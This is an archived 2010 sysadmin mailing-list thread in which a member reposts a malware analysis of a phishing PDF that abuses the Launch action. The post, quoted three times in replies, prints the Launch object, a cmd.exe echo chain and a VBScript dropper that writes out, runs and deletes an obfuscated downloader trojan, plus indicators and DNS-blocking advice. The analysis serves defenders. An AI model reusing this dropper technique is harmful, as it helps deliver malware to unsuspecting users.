Re: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-29 Thread Brian Richards
Amusingly, just got an ad from Adobe which encourages us to Interact with 
recipients by sending out PDF forms

http://direct.adobe.com/v?xPJJvHWEJnqWWclHJT

Brian
MCSE and stuff

snip
~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~ http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/  ~

RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-29 Thread John Aldrich
A couple of my users got a fake spam / virus alert email overnight that
really contained a malware payload. I saved the zipped attachment out and
scanned it with Vipre, but it didn't find anything until I tried to extract
the contents of the zip file. 

 

John-AldrichTile-Tools

 

From: Brian Richards [mailto:locomotive_breath_...@yahoo.com] 
Sent: Thursday, April 29, 2010 9:19 AM
To: NT System Admin Issues
Subject: Re: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

 

Amusingly, just got an ad from Adobe which encourages us to Interact with
recipients by sending out PDF forms

 

http://direct.adobe.com/v?xPJJvHWEJnqWWclHJT

Brian

MCSE and stuff

 

snip

 

 

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~ http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/  ~image001.jpgimage002.jpg

Re: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-29 Thread viperborg
Someone in marketing failed.
Sent from my BlackBerry® smartphone with Nextel Direct Connect

-Original Message-
From: Brian Richards locomotive_breath_...@yahoo.com
Date: Thu, 29 Apr 2010 06:18:52 
To: NT System Admin Issuesntsysadmin@lyris.sunbelt-software.com
Subject: Re: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

Amusingly, just got an ad from Adobe which encourages us to Interact with 
recipients by sending out PDF forms

http://direct.adobe.com/v?xPJJvHWEJnqWWclHJT

Brian
MCSE and stuff

snip
~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~ http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/  ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~ http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/  ~


RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-28 Thread Ziots, Edward
Gang there is another PDF exploit going on that may or may not be hitting your 
places: Credit to Secureworks (tm) for the writeup below. 

See below: 
Ideals: Set up a zone in your DNS called jademason.com and set it to answer to 
127.0.0.1, and clear the cache on your DNS servers accordingly. Which should 
blackhole the zone. 

Note this is a fast-flux domain, as you can see from the different dns returns 
on nslookup. 
Also scan all your PDF files, some of the major AV vendors are picking this up 
and its packed exploit. 
 jademason.com
Server:  xx.xx.xx.xx
Address:  xx.xx.xx.xx
Non-authoritative answer:
Name:jademason.com
Addresses:  190.184.91.252
  89.76.186.112
  178.24.184.230
  190.165.141.141
  190.160.133.173
  89.103.178.41
  78.90.2.123
  89.74.43.46

About 5 mins later:
Non-authoritative answer:
Name:jademason.com
Addresses:  201.174.208.101
  89.135.159.78
  94.246.125.4
  190.184.91.252
  201.241.102.230
  89.74.43.46
  92.230.71.40
  201.132.99.207



From: notificati...@yyybank.com
[mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.
It contained a file called doc.pdf. That file was, of course, malicious in 
nature. It used the PDF Launch vulnerability to run echo some commands into a 
bat file and then bootstrap itself to running the Emold downloader trojan. 
Let's take a look. 


8 0 obj

 /Type /Action
 /S /Launch
 /Win
 
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject(Scripting.FileSystemObject)
   script.vbs  echo Set f=fso.OpenTextFile(doc.pdf, 1, True)
   script.vbs  echo pf=f.ReadAll
   script.vbs  echo s=InStr(pf,'SS)
   script.vbs  echo e=InStr(pf,'EE)
   script.vbs  echo s=Mid(pf,s,e-s)
   script.vbs  echo Set z=fso.OpenTextFile(batscript.vbs, 2, True)
   script.vbs  echo s = Replace(s,%,)
   script.vbs  echo z.Write(s)
   script.vbs  script.vbs  batscript.vbs This uses cmd.exe to write some 
lines of text to a file called script.vbs and then executes script.vbs and 
batscript.vbs. 

Let's look at how script.vbs ends up: 


Set fso=CreateObject(Scripting.FileSystemObject)
Set f=fso.OpenTextFile(doc.pdf, 1, True) echo pf=f.ReadAll echo 
s=InStr(pf,'SS) echo e=InStr(pf,'EE)
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile(batscript.vbs, 2, True) s = Replace(s,%,)
z.Write(s)
When Script.vbs runs, it opens doc.pdf and looks for the tags SS and EE to 
mark the beginning and end of a section of the pdf. It grabs that section, does 
a little bit of text manipulation and then writes the result to batscript.vbs. 

Next let's look what's in that tagged section of doc.pdf (that ends up 
batscript.vbs): 


5 0 obj
 /Length 46 
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000 ),)
%Set fso = CreateObject(Scripting.FileSystemObject)
%Set f = fso.OpenTextFile(game.exe, 2, True) %For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject(WScript.Shell)
%WshShell.Run cmd.exe /c game.exe
%WScript.Sleep 3000
%Set f  = FSO.GetFile(game.exe)
%f.Delete
%Set f  = FSO.GetFile(batscript.vbs)
%f.Delete
%Set f  = FSO.GetFile(script.vbs)
%f.Delete
%'EE
endstream
We can now see that the array stored in b is actually an obfuscated executable 
file that is stored in game.exe. After running game.exe this script (executed 
in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, 
and script.vbs. 

Game.exe is the Elmod trojan. This is a generic downloader which can be used to 
install any number of second stage trojans. It can be identified by the 
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the 
registry key software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\explorer.exe, and because it phones home to (currently) jademason.com.

Adobe has said that the Launch functionality is a feature, not a bug. Adobe is 
looking into the issue, but has not said what action, if any, they intended to 
take to mitigate the danger. Their post on the matter does include directions 
for turning off this functionality.

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA
Network Engineer
Lifespan Organization
401-639-3505
ezi...@lifespan.org


-Original Message-
From: Stu Sjouwerman [mailto:s...@sunbelt-software.com] 
Sent: Wednesday, April 28, 2010 4:17 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Erm, There are 115 known strains (and growing fast) of malware 
for the Mac. That's why we are releasing a VIPRE client for the 
Mac in Q2. They have sold 

RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-28 Thread Sean Rector
Thanks, Z!

Sean Rector, MCSE

-Original Message-
From: Ziots, Edward [mailto:ezi...@lifespan.org] 
Sent: Wednesday, April 28, 2010 4:50 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

Gang there is another PDF exploit going on that may or may not be hitting your 
places: Credit to Secureworks (tm) for the writeup below. 

See below: 
Ideals: Set up a zone in your DNS called jademason.com and set it to answer to 
127.0.0.1, and clear the cache on your DNS servers accordingly. Which should 
blackhole the zone. 

Note this is a fast-flux domain, as you can see from the different dns returns 
on nslookup. 
Also scan all your PDF files, some of the major AV vendors are picking this up 
and its packed exploit. 
 jademason.com
Server:  xx.xx.xx.xx
Address:  xx.xx.xx.xx
Non-authoritative answer:
Name:jademason.com
Addresses:  190.184.91.252
  89.76.186.112
  178.24.184.230
  190.165.141.141
  190.160.133.173
  89.103.178.41
  78.90.2.123
  89.74.43.46

About 5 mins later:
Non-authoritative answer:
Name:jademason.com
Addresses:  201.174.208.101
  89.135.159.78
  94.246.125.4
  190.184.91.252
  201.241.102.230
  89.74.43.46
  92.230.71.40
  201.132.99.207



From: notificati...@yyybank.com
[mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.
It contained a file called doc.pdf. That file was, of course, malicious in 
nature. It used the PDF Launch vulnerability to run echo some commands into a 
bat file and then bootstrap itself to running the Emold downloader trojan. 
Let's take a look. 


8 0 obj

 /Type /Action
 /S /Launch
 /Win
 
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject(Scripting.FileSystemObject)
   script.vbs  echo Set f=fso.OpenTextFile(doc.pdf, 1, True)
   script.vbs  echo pf=f.ReadAll
   script.vbs  echo s=InStr(pf,'SS)
   script.vbs  echo e=InStr(pf,'EE)
   script.vbs  echo s=Mid(pf,s,e-s)
   script.vbs  echo Set z=fso.OpenTextFile(batscript.vbs, 2, True)
   script.vbs  echo s = Replace(s,%,)
   script.vbs  echo z.Write(s)
   script.vbs  script.vbs  batscript.vbs This uses cmd.exe to write some 
lines of text to a file called script.vbs and then executes script.vbs and 
batscript.vbs. 

Let's look at how script.vbs ends up: 


Set fso=CreateObject(Scripting.FileSystemObject)
Set f=fso.OpenTextFile(doc.pdf, 1, True) echo pf=f.ReadAll echo 
s=InStr(pf,'SS) echo e=InStr(pf,'EE)
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile(batscript.vbs, 2, True) s = Replace(s,%,)
z.Write(s)
When Script.vbs runs, it opens doc.pdf and looks for the tags SS and EE to 
mark the beginning and end of a section of the pdf. It grabs that section, does 
a little bit of text manipulation and then writes the result to batscript.vbs. 

Next let's look what's in that tagged section of doc.pdf (that ends up 
batscript.vbs): 


5 0 obj
 /Length 46 
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000 ),)
%Set fso = CreateObject(Scripting.FileSystemObject)
%Set f = fso.OpenTextFile(game.exe, 2, True) %For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject(WScript.Shell)
%WshShell.Run cmd.exe /c game.exe
%WScript.Sleep 3000
%Set f  = FSO.GetFile(game.exe)
%f.Delete
%Set f  = FSO.GetFile(batscript.vbs)
%f.Delete
%Set f  = FSO.GetFile(script.vbs)
%f.Delete
%'EE
endstream
We can now see that the array stored in b is actually an obfuscated executable 
file that is stored in game.exe. After running game.exe this script (executed 
in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, 
and script.vbs. 

Game.exe is the Elmod trojan. This is a generic downloader which can be used to 
install any number of second stage trojans. It can be identified by the 
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the 
registry key software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\explorer.exe, and because it phones home to (currently) jademason.com.

Adobe has said that the Launch functionality is a feature, not a bug. Adobe is 
looking into the issue, but has not said what action, if any, they intended to 
take to mitigate the danger. Their post on the matter does include directions 
for turning off this functionality.

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA Network Engineer Lifespan Organization
401-639-3505
ezi...@lifespan.org


-Original Message-
From: Stu Sjouwerman [mailto:s...@sunbelt-software.com

RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

2010-04-28 Thread Stu Sjouwerman
We will be releasing a detection for this PDF exploit in a couple of hours.

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Sean Rector [mailto:sean.rec...@vaopera.org] 
Sent: Wednesday, April 28, 2010 5:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

Thanks, Z!

Sean Rector, MCSE

-Original Message-
From: Ziots, Edward [mailto:ezi...@lifespan.org] 
Sent: Wednesday, April 28, 2010 4:50 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

Gang there is another PDF exploit going on that may or may not be hitting your 
places: Credit to Secureworks (tm) for the writeup below. 

See below: 
Ideals: Set up a zone in your DNS called jademason.com and set it to answer to 
127.0.0.1, and clear the cache on your DNS servers accordingly. Which should 
blackhole the zone. 

Note this is a fast-flux domain, as you can see from the different dns returns 
on nslookup. 
Also scan all your PDF files, some of the major AV vendors are picking this up 
and its packed exploit. 
 jademason.com
Server:  xx.xx.xx.xx
Address:  xx.xx.xx.xx
Non-authoritative answer:
Name:jademason.com
Addresses:  190.184.91.252
  89.76.186.112
  178.24.184.230
  190.165.141.141
  190.160.133.173
  89.103.178.41
  78.90.2.123
  89.74.43.46

About 5 mins later:
Non-authoritative answer:
Name:jademason.com
Addresses:  201.174.208.101
  89.135.159.78
  94.246.125.4
  190.184.91.252
  201.241.102.230
  89.74.43.46
  92.230.71.40
  201.132.99.207



From: notificati...@yyybank.com
[mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.
It contained a file called doc.pdf. That file was, of course, malicious in 
nature. It used the PDF Launch vulnerability to run echo some commands into a 
bat file and then bootstrap itself to running the Emold downloader trojan. 
Let's take a look. 


8 0 obj

 /Type /Action
 /S /Launch
 /Win
 
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject(Scripting.FileSystemObject)
   script.vbs  echo Set f=fso.OpenTextFile(doc.pdf, 1, True)
   script.vbs  echo pf=f.ReadAll
   script.vbs  echo s=InStr(pf,'SS)
   script.vbs  echo e=InStr(pf,'EE)
   script.vbs  echo s=Mid(pf,s,e-s)
   script.vbs  echo Set z=fso.OpenTextFile(batscript.vbs, 2, True)
   script.vbs  echo s = Replace(s,%,)
   script.vbs  echo z.Write(s)
   script.vbs  script.vbs  batscript.vbs This uses cmd.exe to write some 
lines of text to a file called script.vbs and then executes script.vbs and 
batscript.vbs. 

Let's look at how script.vbs ends up: 


Set fso=CreateObject(Scripting.FileSystemObject)
Set f=fso.OpenTextFile(doc.pdf, 1, True) echo pf=f.ReadAll echo 
s=InStr(pf,'SS) echo e=InStr(pf,'EE)
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile(batscript.vbs, 2, True) s = Replace(s,%,)
z.Write(s)
When Script.vbs runs, it opens doc.pdf and looks for the tags SS and EE to 
mark the beginning and end of a section of the pdf. It grabs that section, does 
a little bit of text manipulation and then writes the result to batscript.vbs. 

Next let's look what's in that tagged section of doc.pdf (that ends up 
batscript.vbs): 


5 0 obj
 /Length 46 
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000 ),)
%Set fso = CreateObject(Scripting.FileSystemObject)
%Set f = fso.OpenTextFile(game.exe, 2, True) %For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject(WScript.Shell)
%WshShell.Run cmd.exe /c game.exe
%WScript.Sleep 3000
%Set f  = FSO.GetFile(game.exe)
%f.Delete
%Set f  = FSO.GetFile(batscript.vbs)
%f.Delete
%Set f  = FSO.GetFile(script.vbs)
%f.Delete
%'EE
endstream
We can now see that the array stored in b is actually an obfuscated executable 
file that is stored in game.exe. After running game.exe this script (executed 
in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, 
and script.vbs. 

Game.exe is the Elmod trojan. This is a generic downloader which can be used to 
install any number of second stage trojans. It can be identified by the 
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the 
registry key software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\explorer.exe, and because it phones home to (currently) jademason.com.

Adobe has said that the Launch